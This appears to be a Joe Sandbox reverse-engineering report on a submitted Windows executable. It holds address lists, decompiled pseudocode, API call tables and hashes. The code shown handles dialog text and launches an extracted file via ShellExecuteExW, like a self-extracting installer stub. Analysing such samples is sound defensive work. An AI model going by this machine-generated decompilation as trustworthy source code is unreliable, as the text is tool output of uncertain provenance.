                                                    0x00cce09a
                                                    0x00cce09b
                                                    0x00cce09e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0a0
                                                    0x00cce0a6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0ac
                                                    0x00cce0ac
                                                    0x00cce0b0
                                                    0x00000000
                                                    0x00cce0b0
                                                    0x00cce041
                                                    0x00cce047
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce051
                                                    0x00cce051
                                                    0x00cce054
                                                    0x00cce07b
                                                    0x00cce07d
                                                    0x00cce07d
                                                    0x00cce07e
                                                    0x00cce085
                                                    0x00cce086
                                                    0x00cce089
                                                    0x00000000
                                                    0x00cce089
                                                    0x00cce056
                                                    0x00cce056
                                                    0x00cce059
                                                    0x00cce077
                                                    0x00000000
                                                    0x00cce077
                                                    0x00cce05b
                                                    0x00cce05b
                                                    0x00cce05e
                                                    0x00cce073
                                                    0x00000000
                                                    0x00cce073
                                                    0x00cce060
                                                    0x00cce060
                                                    0x00cce063
                                                    0x00cce06f
                                                    0x00000000
                                                    0x00cce06f
                                                    0x00cce066
                                                    0x00cce069
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce06b
                                                    0x00000000
                                                    0x00cce06b
                                                    0x00ccdd99
                                                    0x00ccdd9e
                                                    0x00ccdda2
                                                    0x00ccddae
                                                    0x00ccddb0
                                                    0x00ccddb1
                                                    0x00ccddb5
                                                    0x00ccdf29
                                                    0x00ccdf2c
                                                    0x00ccdf33
                                                    0x00ccdf38
                                                    0x00ccdf3a
                                                    0x00cce024
                                                    0x00cce024
                                                    0x00cce027
                                                    0x00000000
                                                    0x00cce027
                                                    0x00ccdf4c
                                                    0x00ccdf5d
                                                    0x00ccdf62
                                                    0x00ccdf67
                                                    0x00ccdf69
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdf71
                                                    0x00ccdf84
                                                    0x00ccdf99
                                                    0x00ccdfae
                                                    0x00ccdfc0
                                                    0x00ccdfdb
                                                    0x00ccdfe0
                                                    0x00ccdfe3
                                                    0x00ccdfe5
                                                    0x00ccdfe7
                                                    0x00ccdfe7
                                                    0x00ccdfea
                                                    0x00ccdff0
                                                    0x00ccdff0
                                                    0x00cce004
                                                    0x00cce004
                                                    0x00cce006
                                                    0x00cce009
                                                    0x00cce009
                                                    0x00cce00d
                                                    0x00cce011
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce013
                                                    0x00cce013
                                                    0x00cce017
                                                    0x00cce01c
                                                    0x00000000
                                                    0x00cce01c
                                                    0x00cce019
                                                    0x00cce019
                                                    0x00cce009
                                                    0x00cce00d
                                                    0x00cce011
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce011
                                                    0x00cce009
                                                    0x00ccddbb
                                                    0x00ccddbe
                                                    0x00ccddbe
                                                    0x00ccddc1
                                                    0x00ccddc3
                                                    0x00ccddc6
                                                    0x00ccddc9
                                                    0x00ccddd0
                                                    0x00ccddd7
                                                    0x00ccddde
                                                    0x00ccdde5
                                                    0x00ccddf6
                                                    0x00ccddfd
                                                    0x00ccde02
                                                    0x00ccde05
                                                    0x00ccde07
                                                    0x00ccde22
                                                    0x00ccde22
                                                    0x00000000
                                                    0x00ccde22
                                                    0x00ccde0c
                                                    0x00ccde10
                                                    0x00ccde11
                                                    0x00ccde16
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde18
                                                    0x00ccde1a
                                                    0x00ccde1d
                                                    0x00ccde25
                                                    0x00ccde25
                                                    0x00ccde26
                                                    0x00ccde26
                                                    0x00ccde2b
                                                    0x00ccde2e
                                                    0x00ccde30
                                                    0x00ccde33
                                                    0x00ccde36
                                                    0x00ccde38
                                                    0x00ccde55
                                                    0x00ccde58
                                                    0x00ccde5b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde61
                                                    0x00ccde61
                                                    0x00ccde61
                                                    0x00ccde64
                                                    0x00ccde67
                                                    0x00ccde6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde6d
                                                    0x00ccde6d
                                                    0x00ccde71
                                                    0x00ccde78
                                                    0x00ccde7b
                                                    0x00ccde80
                                                    0x00ccde81
                                                    0x00ccde84
                                                    0x00ccde87
                                                    0x00ccde8a
                                                    0x00ccdeab
                                                    0x00ccdead
                                                    0x00ccdec5
                                                    0x00ccdecd
                                                    0x00ccded0
                                                    0x00ccded3
                                                    0x00ccded6
                                                    0x00ccdefc
                                                    0x00ccdeff
                                                    0x00ccdf04
                                                    0x00ccdf06
                                                    0x00ccdf06
                                                    0x00ccdf1c
                                                    0x00ccdf21
                                                    0x00ccded8
                                                    0x00ccdee4
                                                    0x00ccdef0
                                                    0x00ccdef4
                                                    0x00ccdef4
                                                    0x00ccde4d
                                                    0x00ccde4d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde8c
                                                    0x00ccde8c
                                                    0x00ccde8c
                                                    0x00ccde8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde91
                                                    0x00ccde94
                                                    0x00ccde97
                                                    0x00ccde9f
                                                    0x00ccdea2
                                                    0x00ccdea3
                                                    0x00ccdea6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdea6
                                                    0x00ccdea8
                                                    0x00000000
                                                    0x00ccdea8
                                                    0x00ccde73
                                                    0x00ccde73
                                                    0x00ccde61
                                                    0x00ccde61
                                                    0x00ccde64
                                                    0x00ccde67
                                                    0x00ccde6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde6b
                                                    0x00ccde61
                                                    0x00ccde48
                                                    0x00000000
                                                    0x00ccde48
                                                    0x00ccdda4
                                                    0x00ccdda8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce150
                                                    0x00cce150
                                                    0x00cce150
                                                    0x00cce159
                                                    0x00000000
                                                    0x00ccdd4a
                                                    0x00ccdd4b
                                                    0x00000000
                                                    0x00ccdd50
                                                    0x00ccdd48
                                                    0x00ccdcd3
                                                    0x00ccdcd5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdb17
                                                    0x00ccdb1a
                                                    0x00ccdb23
                                                    0x00ccdb28
                                                    0x00ccdb29
                                                    0x00ccdb2f
                                                    0x00000000
                                                    0x00ccdb31
                                                    0x00ccdb31
                                                    0x00000000
                                                    0x00ccdb31
                                                    0x00ccdb2f

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CCDA70
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CCDAAC
                                                      • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                      • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010398), ref: 00CD1BA0
                                                    • _wcslen.LIBCMT ref: 00CCDDE9
                                                    • __fprintf_l.LIBCMT ref: 00CCDF1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                    • API String ID: 566448164-801612888
                                                    • Opcode ID: fdd5a394b4ccda8de3dff6b10ec9f314a2c988560873033f0bf97b2f485ecd2c
                                                    • Instruction ID: 8bef2f5362f6f36bed33b5595a108d5226be16f9609852e2329ae2571c6bf6c3
                                                    • Opcode Fuzzy Hash: fdd5a394b4ccda8de3dff6b10ec9f314a2c988560873033f0bf97b2f485ecd2c
                                                    • Instruction Fuzzy Hash: 9132D071900258ABCF24EF68C845FEE77A5EF15300F44016EFA1697281EBB1EE85DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 100%
                                                    			E00CDD4D4() {
                                                    				intOrPtr _t41;
                                                    				intOrPtr _t44;
                                                    				struct HWND__* _t46;
                                                    				void* _t48;
                                                    				char _t49;
                                                    
                                                    				E00CDB568(); // executed
                                                    				_t46 = GetDlgItem( *0xd08458, 0x68);
                                                    				_t49 =  *0xd08463; // 0x1
                                                    				if(_t49 == 0) {
                                                    					_t44 =  *0xd08440; // 0x0
                                                    					E00CD9285(_t44);
                                                    					ShowWindow(_t46, 5); // executed
                                                    					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
                                                    					SendMessageW(_t46, 0xc2, 0, 0xcf35f4);
                                                    					 *0xd08463 = 1;
                                                    				}
                                                    				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
                                                    				 *(_t48 + 0x10) = 0x5c;
                                                    				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
                                                    				 *((char*)(_t48 + 0x29)) = 0;
                                                    				_t41 =  *((intOrPtr*)(_t48 + 0x70));
                                                    				 *((intOrPtr*)(_t48 + 0x14)) = 1;
                                                    				if(_t41 != 0) {
                                                    					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
                                                    					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
                                                    					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
                                                    				}
                                                    				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
                                                    				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
                                                    				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
                                                    				if(_t41 != 0) {
                                                    					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
                                                    					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
                                                    				}
                                                    				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
                                                    			}









                                                    APIs
                                                      • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                      • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                      • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                      • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                      • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    • GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                    • String ID: \
                                                    • API String ID: 3569833718-2967466578
                                                    • Opcode ID: 474138349c535ba0ef10354567869485e0ea1c230e9304622176235ae12815d6
                                                    • Instruction ID: b104c5dd5367a065df885a9e2dbee3cc7c74aa920c3ff34c4f8f515408fc272f
                                                    • Opcode Fuzzy Hash: 474138349c535ba0ef10354567869485e0ea1c230e9304622176235ae12815d6
                                                    • Instruction Fuzzy Hash: 7331E271145342BFE311DF20EC4AFAB7FACEB96704F000519F691D63A0EB688A058B76
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    C-Code - Quality: 81%
                                                    			E00CDD78F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
                                                    				long _v12;
                                                    				void* __edi;
                                                    				int _t47;
                                                    				signed int _t50;
                                                    				void* _t51;
                                                    				signed short* _t53;
                                                    				long _t64;
                                                    				signed int _t71;
                                                    				void* _t72;
                                                    				signed short _t73;
                                                    				int _t74;
                                                    				void* _t76;
                                                    				signed int _t77;
                                                    				intOrPtr _t78;
                                                    				long _t80;
                                                    				signed int _t81;
                                                    				void* _t82;
                                                    				void* _t84;
                                                    				signed int _t86;
                                                    				signed short* _t87;
                                                    				struct HWND__* _t88;
                                                    				void* _t89;
                                                    				void* _t92;
                                                    
                                                    				_t89 = __ebp;
                                                    				_t47 = E00CDEC50(0x1040);
                                                    				_t87 = _a4168;
                                                    				_t74 = 0;
                                                    				if( *_t87 == 0) {
                                                    					L54:
                                                    					return _t47;
                                                    				}
                                                    				_t47 = E00CE3E13(_t87);
                                                    				if(_t47 >= 0x7f6) {
                                                    					goto L54;
                                                    				} else {
                                                    					_t80 = 0x3c;
                                                    					E00CDFFF0(_t80,  &_a4, 0, _t80);
                                                    					_t78 = _a4176;
                                                    					_t92 = _t92 + 0xc;
                                                    					_a4.cbSize = _t80;
                                                    					_a8 = 0x1c0;
                                                    					if(_t78 != 0) {
                                                    						_a8 = 0x5c0;
                                                    					}
                                                    					_t50 =  *_t87 & 0x0000ffff;
                                                    					_push(_t89);
                                                    					_t76 = 0x22;
                                                    					_t81 = _t50;
                                                    					_t77 = _t74;
                                                    					if(_t50 != _t76) {
                                                    						_t90 = _t87;
                                                    						_a20 = _t87;
                                                    						goto L16;
                                                    					} else {
                                                    						_t90 =  &(_t87[1]);
                                                    						_a20 =  &(_t87[1]);
                                                    						L6:
                                                    						_t51 = 0x22;
                                                    						if(_t81 != _t51) {
                                                    							L13:
                                                    							_t82 = 0x20;
                                                    							_t53 =  &(( &(_t87[1]))[_t77]);
                                                    							if(_t87[_t77] == _t82) {
                                                    								_t87[_t77] = 0;
                                                    								L48:
                                                    								_a24 = _t53;
                                                    								L18:
                                                    								if(_t53 == 0 ||  *_t53 == _t74) {
                                                    									if(_t78 == 0 &&  *0xd0b472 != _t74) {
                                                    										_a24 = 0xd0b472;
                                                    									}
                                                    								}
                                                    								_a32 = _a4172;
                                                    								_t84 = E00CCB92D(_t90);
                                                    								if(_t84 != 0 && E00CD1FBB(_t84, L".inf") == 0) {
                                                    									_a16 = L"Install";
                                                    								}
                                                    								if(E00CCA231(_a20) != 0) {
                                                    									E00CCB6C4(_a20,  &_a64, 0x800);
                                                    									_a8 =  &_a52;
                                                    								}
                                                    								_t47 = ShellExecuteExW( &_a4); // executed
                                                    								if(_t47 != 0) {
                                                    									_t88 = _a4160;
                                                    									if( *0xd09468 != _t74 || _a4172 != _t74 ||  *0xd17b7a != _t74) {
                                                    										if(_t88 != 0) {
                                                    											_push(_t88);
                                                    											if( *0xd230a8() != 0) {
                                                    												ShowWindow(_t88, _t74);
                                                    												_t74 = 1;
                                                    											}
                                                    										}
                                                    										 *0xd230a4(_a56, 0x7d0);
                                                    										E00CDDC3B(_a48);
                                                    										if( *0xd17b7a != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
                                                    											_t64 = _v12;
                                                    											if(_t64 >  *0xd1fca4) {
                                                    												 *0xd1fca4 = _t64;
                                                    											}
                                                    											 *0xd17b7b = 1;
                                                    										}
                                                    									}
                                                    									CloseHandle(_a48);
                                                    									if(_t84 == 0 || E00CD1FBB(_t84, L".exe") != 0) {
                                                    										_t47 = _a4164;
                                                    										if( *0xd09468 != 0 && _t47 == 0 &&  *0xd17b7a == _t47) {
                                                    											 *0xd1fca8 = 0x1b58;
                                                    										}
                                                    									} else {
                                                    										_t47 = _a4164;
                                                    									}
                                                    									if(_t74 != 0 && _t47 != 0) {
                                                    										_t47 = ShowWindow(_t88, 1);
                                                    									}
                                                    								}
                                                    								goto L54;
                                                    							}
                                                    							if( *_t53 == 0x2f) {
                                                    								goto L48;
                                                    							}
                                                    							_t77 = _t77 + 1;
                                                    							_t50 = _t87[_t77] & 0x0000ffff;
                                                    							_t81 = _t50;
                                                    							L16:
                                                    							if(_t50 != 0) {
                                                    								goto L6;
                                                    							}
                                                    							_t53 = _a24;
                                                    							goto L18;
                                                    						} else {
                                                    							while(1) {
                                                    								_t77 = _t77 + 1;
                                                    								_t71 = _t87[_t77] & 0x0000ffff;
                                                    								_t86 = _t71;
                                                    								if(_t71 == 0) {
                                                    									break;
                                                    								}
                                                    								_t72 = 0x22;
                                                    								if(_t86 == _t72) {
                                                    									_t73 = 0x20;
                                                    									_t87[_t77] = _t73;
                                                    									goto L13;
                                                    								}
                                                    							}
                                                    							goto L13;
                                                    						}
                                                    					}
                                                    				}
                                                    			}



























                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                    • String ID: .exe$.inf
                                                    • API String ID: 36480843-3750412487
                                                    • Opcode ID: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                    • Instruction ID: 1525631867463765d6fb796b0d1692b15002b5d3019f9c281ffe5244e3842a1b
                                                    • Opcode Fuzzy Hash: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                    • Instruction Fuzzy Hash: FE51C370808380AAD7319F64A854BBBBBE4AF41744F04041FF7D6973A1DB729B85D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    C-Code - Quality: 70%
                                                    			E00CEA95B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                    				signed int _v8;
                                                    				int _v12;
                                                    				void* _v24;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t49;
                                                    				signed int _t54;
                                                    				int _t57;
                                                    				signed int _t59;
                                                    				short* _t61;
                                                    				signed int _t65;
                                                    				short* _t70;
                                                    				int _t79;
                                                    				void* _t81;
                                                    				short* _t82;
                                                    				signed int _t88;
                                                    				signed int _t91;
                                                    				void* _t96;
                                                    				int _t98;
                                                    				void* _t99;
                                                    				short* _t101;
                                                    				int _t103;
                                                    				void* _t104;
                                                    				int _t105;
                                                    				signed int _t106;
                                                    				short* _t107;
                                                    				void* _t110;
                                                    
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t49 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t49 ^ _t106;
                                                    				_t103 = _a20;
                                                    				if(_t103 > 0) {
                                                    					_t79 = E00CEEF4C(_a16, _t103);
                                                    					_t110 = _t79 - _t103;
                                                    					_t4 = _t79 + 1; // 0x1
                                                    					_t103 = _t4;
                                                    					if(_t110 >= 0) {
                                                    						_t103 = _t79;
                                                    					}
                                                    				}
                                                    				_t98 = _a32;
                                                    				if(_t98 == 0) {
                                                    					_t98 =  *( *_a4 + 8);
                                                    					_a32 = _t98;
                                                    				}
                                                    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                    				_v12 = _t54;
                                                    				if(_t54 == 0) {
                                                    					L38:
                                                    					_pop(_t99);
                                                    					_pop(_t104);
                                                    					_pop(_t81);
                                                    					return E00CDFBBC(_t54, _t81, _v8 ^ _t106, _t96, _t99, _t104);
                                                    				} else {
                                                    					_t96 = _t54 + _t54;
                                                    					_t86 = _t96 + 8;
                                                    					asm("sbb eax, eax");
                                                    					if((_t96 + 0x00000008 & _t54) == 0) {
                                                    						_t82 = 0;
                                                    						__eflags = 0;
                                                    						L14:
                                                    						if(_t82 == 0) {
                                                    							L36:
                                                    							_t105 = 0;
                                                    							L37:
                                                    							E00CEABC3(_t82);
                                                    							_t54 = _t105;
                                                    							goto L38;
                                                    						}
                                                    						_t57 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t82, _v12);
                                                    						_t121 = _t57;
                                                    						if(_t57 == 0) {
                                                    							goto L36;
                                                    						}
                                                    						_t100 = _v12;
                                                    						_t59 = E00CEAF6C(_t82, _t86, _v12, _t121, _a8, _a12, _t82, _v12, 0, 0, 0, 0, 0); // executed
                                                    						_t105 = _t59;
                                                    						if(_t105 == 0) {
                                                    							goto L36;
                                                    						}
                                                    						if((_a12 & 0x00000400) == 0) {
                                                    							_t96 = _t105 + _t105;
                                                    							_t88 = _t96 + 8;
                                                    							__eflags = _t96 - _t88;
                                                    							asm("sbb eax, eax");
                                                    							__eflags = _t88 & _t59;
                                                    							if((_t88 & _t59) == 0) {
                                                    								_t101 = 0;
                                                    								__eflags = 0;
                                                    								L30:
                                                    								__eflags = _t101;
                                                    								if(__eflags == 0) {
                                                    									L35:
                                                    									E00CEABC3(_t101);
                                                    									goto L36;
                                                    								}
                                                    								_t61 = E00CEAF6C(_t82, _t88, _t101, __eflags, _a8, _a12, _t82, _v12, _t101, _t105, 0, 0, 0);
                                                    								__eflags = _t61;
                                                    								if(_t61 == 0) {
                                                    									goto L35;
                                                    								}
                                                    								_push(0);
                                                    								_push(0);
                                                    								__eflags = _a28;
                                                    								if(_a28 != 0) {
                                                    									_push(_a28);
                                                    									_push(_a24);
                                                    								} else {
                                                    									_push(0);
                                                    									_push(0);
                                                    								}
                                                    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                    								__eflags = _t105;
                                                    								if(_t105 != 0) {
                                                    									E00CEABC3(_t101);
                                                    									goto L37;
                                                    								} else {
                                                    									goto L35;
                                                    								}
                                                    							}
                                                    							_t91 = _t96 + 8;
                                                    							__eflags = _t96 - _t91;
                                                    							asm("sbb eax, eax");
                                                    							_t65 = _t59 & _t91;
                                                    							_t88 = _t96 + 8;
                                                    							__eflags = _t65 - 0x400;
                                                    							if(_t65 > 0x400) {
                                                    								__eflags = _t96 - _t88;
                                                    								asm("sbb eax, eax");
                                                    								_t101 = E00CE8E06(_t88, _t65 & _t88);
                                                    								_pop(_t88);
                                                    								__eflags = _t101;
                                                    								if(_t101 == 0) {
                                                    									goto L35;
                                                    								}
                                                    								 *_t101 = 0xdddd;
                                                    								L28:
                                                    								_t101 =  &(_t101[4]);
                                                    								goto L30;
                                                    							}
                                                    							__eflags = _t96 - _t88;
                                                    							asm("sbb eax, eax");
                                                    							E00CF2010(_t65 & _t88);
                                                    							_t101 = _t107;
                                                    							__eflags = _t101;
                                                    							if(_t101 == 0) {
                                                    								goto L35;
                                                    							}
                                                    							 *_t101 = 0xcccc;
                                                    							goto L28;
                                                    						}
                                                    						_t70 = _a28;
                                                    						if(_t70 == 0) {
                                                    							goto L37;
                                                    						}
                                                    						_t125 = _t105 - _t70;
                                                    						if(_t105 > _t70) {
                                                    							goto L36;
                                                    						}
                                                    						_t105 = E00CEAF6C(_t82, 0, _t100, _t125, _a8, _a12, _t82, _t100, _a24, _t70, 0, 0, 0);
                                                    						if(_t105 != 0) {
                                                    							goto L37;
                                                    						}
                                                    						goto L36;
                                                    					}
                                                    					asm("sbb eax, eax");
                                                    					_t72 = _t54 & _t96 + 0x00000008;
                                                    					_t86 = _t96 + 8;
                                                    					if((_t54 & _t96 + 0x00000008) > 0x400) {
                                                    						__eflags = _t96 - _t86;
                                                    						asm("sbb eax, eax");
                                                    						_t82 = E00CE8E06(_t86, _t72 & _t86);
                                                    						_pop(_t86);
                                                    						__eflags = _t82;
                                                    						if(__eflags == 0) {
                                                    							goto L36;
                                                    						}
                                                    						 *_t82 = 0xdddd;
                                                    						L12:
                                                    						_t82 =  &(_t82[4]);
                                                    						goto L14;
                                                    					}
                                                    					asm("sbb eax, eax");
                                                    					E00CF2010(_t72 & _t86);
                                                    					_t82 = _t107;
                                                    					if(_t82 == 0) {
                                                    						goto L36;
                                                    					}
                                                    					 *_t82 = 0xcccc;
                                                    					goto L12;
                                                    				}
                                                    			}
































                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CE57FB,00CE57FB,?,?,?,00CEABAC,00000001,00000001,2DE85006), ref: 00CEA9B5
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CEABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CEAA3B
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CEAB35
                                                    • __freea.LIBCMT ref: 00CEAB42
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    • __freea.LIBCMT ref: 00CEAB4B
                                                    • __freea.LIBCMT ref: 00CEAB70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: a260ab546d44d10747a9d9b9e51c52c43335d81079f5d8a242c51186c85f6734
                                                    • Instruction ID: 394873555f12b319fb3a7ed021e714bbc15fae949e484ff91a9df56f4cc9c751
                                                    • Opcode Fuzzy Hash: a260ab546d44d10747a9d9b9e51c52c43335d81079f5d8a242c51186c85f6734
                                                    • Instruction Fuzzy Hash: 1E511372600296AFDB258F66CC81FBFB7AAEB44710F154629FC14D7150EB34ED40E6A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    C-Code - Quality: 100%
